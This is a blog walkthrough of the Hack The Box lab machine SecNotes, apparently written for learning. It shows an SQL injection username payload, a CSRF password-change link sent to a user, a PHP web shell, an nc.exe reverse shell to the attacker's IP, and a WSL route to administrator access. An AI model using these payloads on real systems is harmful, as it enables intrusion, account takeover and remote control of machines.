Skip to main content
Secure The Throne

SecNotes Walkthrough(Hack The Box)

·1387 words·7 mins·
Medium Windows Hack the Box Hacking Active Directory Walkthrough
Emp5r0R
Author
Emp5r0R
Lead By Curiosity
Tryhackme Streamline Icon: https://streamlinehq.comTryHackMe
Table of Contents

Reconnaissance & Enumeration
#

  • As usual I started with a Nmap scan, as for the interesting ones we got port 445 and 80, 8808 open
    Pasted image 20241212212636.png
  • Web port for an Active Directory seems interesting so I quickly checked the port 80 and we got a login page Also with an option to signup for creating new account.
  • This website offeres notes saving feature for it’s users.
  • For starters I registered an account and logged in.
  • After a while I started enumerating. Then I noticed something, its getting the notes listed by using the username and also displays the username on the page. Seems good isn’t it.
    Great

Exploitation
#

  • There are two ways to exploit this website, I am listing the both ways down
    two-ways

Testing SQL Injection -> Path-1
#

  • After seeing this, the idea of sql Injection suddenly sparked within my brain. As this lists notes for the site merely using username is bad cause a simple valid SQL injection payload might make the backend to list all the notes on the server it includes notes of all users.
  • If you haven’t heard of SQL injection and if it’s new to you I already have a short post on SQL injections for begginers. Please check it
  • I started the attack, First I tried 'or 1=1 -- - on the login page it didn’t worked so, the idea here is to create an account with this as the username 'or 1=1 -- -. I created an account with the username of 'or 1=1 -- - and it was a success. There is no validation for usernames, Actually in my opinion validation on everything is a requirement.
    validation
  • With the malicious username now I can view everyone’s notes
    Pasted image 20241212212438.png
  • I searched through all the notes and from one of the notes I got a password and username for SMB share.
    creds

CSRF/XSRF -> Path-2
#

  • After creating a normal account and loggin in. We can see a beautiful page with with many options.
  • When we visit the Contace Us page we could see a username tyler@secnotes.htb. Down to the name we can see a message box.
  • Whatever message we write there will be sent to tyler@secnotes.htb as he is the recipient.
  • Lets test this field, I opened netcat listener on port 7001 like this
nc -lnvp 7001
  • When I send a http link with my IP through the contact form like this http://10.10.14.16:7001 I can see a connection on my listener.
❯ nc -lvnp 7001                               
listening on [any] 7001 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.97] 50700
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.228
Host: 10.10.14.16:7001
Connection: Keep-Alive
  • There is a vulnerable fuction in this website. Which is the password changing function.
  • The account password changing request doesn’t include any CSRF token, so we can abuse this by a CSRF attack.
Definition

What is Cross-site Request Forgery(CSRF/XSRF)

  • Cross-site request forgery (also known as CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It allows an attacker to partly circumvent the same origin policy, which is designed to prevent different websites from interfering with each other. Source: portswigger

Prevention

  • This can be easily prevernted by pressing a CSRF token with each request, A CSRF token is a unique, secret, and unpredictable value that is generated by the server-side application and shared with the client. When attempting to perform a sensitive action, such as submitting a form, the client must include the correct CSRF token in the request. This makes it very difficult for an attacker to construct a valid request on behalf of the victim.

  • Now lets carry on with our attack. The change_pass.php uses html body for it’s data. This is the request:

POST /change_pass.php HTTP/1.1
Host: 10.10.10.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://10.10.10.97
Connection: keep-alive
Referer: http://10.10.10.97/change_pass.php
Cookie: PHPSESSID=gvrrikfl1rol8qiggi03dgpha3
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=kingoo&confirm_password=kingoo&submit=submit
  • I can also change my password like this http://10.10.10.97/change_pass.php?password=iamdumbasf&confirm_password=iamdumbasf&submit=submit too. If I send this URL to tyler I can get him to change his password to iamdumbasf.
  • I sent a message with this URL init. It was successful, I logged in as tyler with the password iamdumbasf
  • This was the request:
POST /contact.php HTTP/1.1
Host: 10.10.10.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: http://10.10.10.97
Connection: keep-alive
Referer: http://10.10.10.97/contact.php
Cookie: PHPSESSID=gvrrikfl1rol8qiggi03dgpha3
Upgrade-Insecure-Requests: 1
Priority: u=0, i

message=http%3A%2F%2F10.10.10.97%2Fchange_pass.php%3Fpassword%3Diamdumbasf%26confirm_password%3Diamdumbasf%26submit%3Dsubmit%26submit%3DSend&submit=Send

Accessing the SMB share
#

  • Quickly after enumerating the shares I logged into a share called new-site cause it seemed interesting, new-site share seems like a share for a web directory which could be this directory or the share for web port 8808. But
    share
  • At this point i’m 100% positive that this share is for the site hosted on web port 8808. I could easily upload a reverse shell and trigger it by going to the path as this is a web port.
  • Wasted literally two hours cause web shells were not working, then after that restarted the machine and got one worked.

Shell
#

  • I Created a file with this code and named it cd.php.
<?php system($_GET['cmd']); ?>
  • This above payload will enable command execution on the system.
  • After uploading it via SMB and I executed/Triggered or tested the shell by visiting this http://secnotes.htb:8808/cd.php?cmd=whoami with a command value of whoami.
  • Got a response, then to get a stable reverse shell connection I uploaded nc.exe into the smb share and accessed it http://10.10.10.97:8808/tester.php?cmd=nc.exe+-e+cmd.exe+10.10.14.5+6001
  • This is the command
nc.exe -e cmd.exe <IP> <PORT>
  • I got a shell back
  • Eventually got
    User flag
    Pasted image 20241212225123.png

Privilege Escalation
#

  • I started my post exploitaion enumeration and while at that I found some interesting files within the C:\\ directory
    Pasted image 20241212225342.png
    interesting
  • Root directory of systems with WSL installed would have directories similar to this and the Ubuntu.zip Indicating that this system has WSL installed.
  • Typically WSL run as root/administrator. If I could excute the bash I could escalate my privilege.
  • To My undertstanding there should a system link file of bash as bash.exe. So to exploit this we can search for bash.exe file
where /R c:\ bash.exe

Pivoting
#

  • I got the path and after executing bash.exe I got root access easily on the wsl.
    Pasted image 20241212230506.png
  • Moments after stablizing the shell using python3 -c 'import pty;pty.spawn("/bin/bash")', I enumerated and read the history of the commands in the terminal and there I could see administrator password for a share.
    Pasted image 20241212230916.png
  • Now I logged in to the share using the administrator’s password.
smbclient -U 'administrator%password' \\\\10.10.10.97\\c$
  • Downloaded the root.txt file using get command
    Pasted image 20241212231856.png
  • Acquired
    Root flag
    Pasted image 20241212231934.png

Summary
#

I identified three open ports: 445 (SMB), 80 (HTTP), and 8808 (HTTP). I started by checking out the web server on port 80, which had a login page with a signup option. I decided to register an account, and I noticed that the notes displayed seemed to be tied to the username. This made me think about potential vulnerabilities, so I attempted an SQL injection by creating an account with the username ‘or 1=1 – -. To my surprise, this worked, and I was able to view all the notes in the system. I also found another way which is a CSRF attack, I generated a password change request and sent the malicious URL to the user tyler through the contact form. Eventually tyler clicked the link which made to change password for his account. One of the notes contained a username and password for an SMB share. I connected to this share, which appeared to be the web directory for the HTTP server running on port 8808, allowing me to upload files. I tried uploading web shells, but they didn’t work initially. After restarting the machine, I finally got a PHP reverse shell to execute, granting me user access and the user flag. After gaining a foothold, I noticed some suspicious files in the C:\ directory, which hinted at the possibility of WSL (Windows Subsystem for Linux) being present. I explored this further and located the bash.exe file. Executing it gave me root access to the Linux environment within WSL. To stabilize my access, I spawned a proper TTY shell and then checked the command history, where I found an administrator password for a share.

bye

Related

Certified Walkthrough(Hack The Box)
·896 words·5 mins
Medium Windows Hack the Box Hacking Active Directory Walkthrough
Access Walkthrough(Hack The Box)
·654 words·4 mins
Easy Windows Hack the Box Hacking Active Directory Walkthrough
Instant Walkthrough(Hack The Box)
·499 words·3 mins
Medium Linux Hack the Box Hacking Web Android Walkthrough